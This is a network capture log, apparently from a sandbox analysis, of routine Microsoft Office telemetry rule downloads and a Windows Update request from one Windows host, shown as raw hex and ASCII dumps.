2024-11-15 13:10:01 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:01 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131001Z-16547b76f7fd4rc5hC1DFWkzhw00000001m000000000b12m x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:01 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49777	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:01 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:01 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:01 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: 09da145b-201e-0033-5108-32b167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131001Z-16547b76f7fnlq8chC1DFWxnen00000000yg00000000cxcp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:01 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49778	52.149.20.212	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:01 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=B9aATLYBnkH1xut&MD=NBebN5mO HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-15 13:10:02 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: c33a6dbc-4b81-401f-a290-2631d3837185 MS-RequestId: dee0ec7c-797d-4058-8b2d-0d8e3e180a77 MS-CV: zwEXgoomzEiOccXI.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 15 Nov 2024 13:10:01 GMT Connection: close Content-Length: 30005
2024-11-15 13:10:02 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-15 13:10:02 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:02 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:02 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:02 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 99102dbc-c01e-0066-43c1-2ca1ec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131002Z-16547b76f7fwvr5dhC1DFW2c940000000n2g000000008qhd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:02 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49780	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:02 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:02 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:02 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 3faa7a2c-701e-001e-5709-37f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131002Z-16547b76f7ftnm6xhC1DFW9c8c000000011g00000000118n x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:02 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49781	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:02 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:02 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:02 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 06b7652e-701e-000d-4eaf-366de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131002Z-16547b76f7frbg6bhC1DFWr5400000000n0000000000emd8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:02 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49782	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:02 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:02 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:02 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 63ea3643-901e-0015-3101-2db284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131002Z-16547b76f7fr28cchC1DFWnuws0000000n6000000000eb72 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:02 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49783	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:02 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:02 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:02 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: bd6b8569-001e-0034-58a8-36dd04000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131002Z-16547b76f7fwvr5dhC1DFW2c940000000mzg00000000ex7k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:02 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49784	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:03 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:03 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:03 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: cc46dee9-d01e-007a-0efd-2cf38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131003Z-16547b76f7f775p5hC1DFWzdvn0000000n700000000047bc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:03 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49785	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:03 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:03 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:03 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 849cffad-401e-008c-4c40-3686c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131003Z-1866b5c5fbbpxkkxhC1DFWhvmc00000001dg00000000et25 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:03 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49786	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:03 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:03 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:03 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 250e4edf-c01e-002b-6cfb-366e00000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131003Z-16547b76f7f7lhvnhC1DFWa2k00000000n5g000000001mmw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:03 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49787	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:03 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:03 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:03 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 23cdba65-001e-0082-460d-375880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131003Z-164f84587bf5rpzqhC1DFWmra800000001cg0000000028pb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
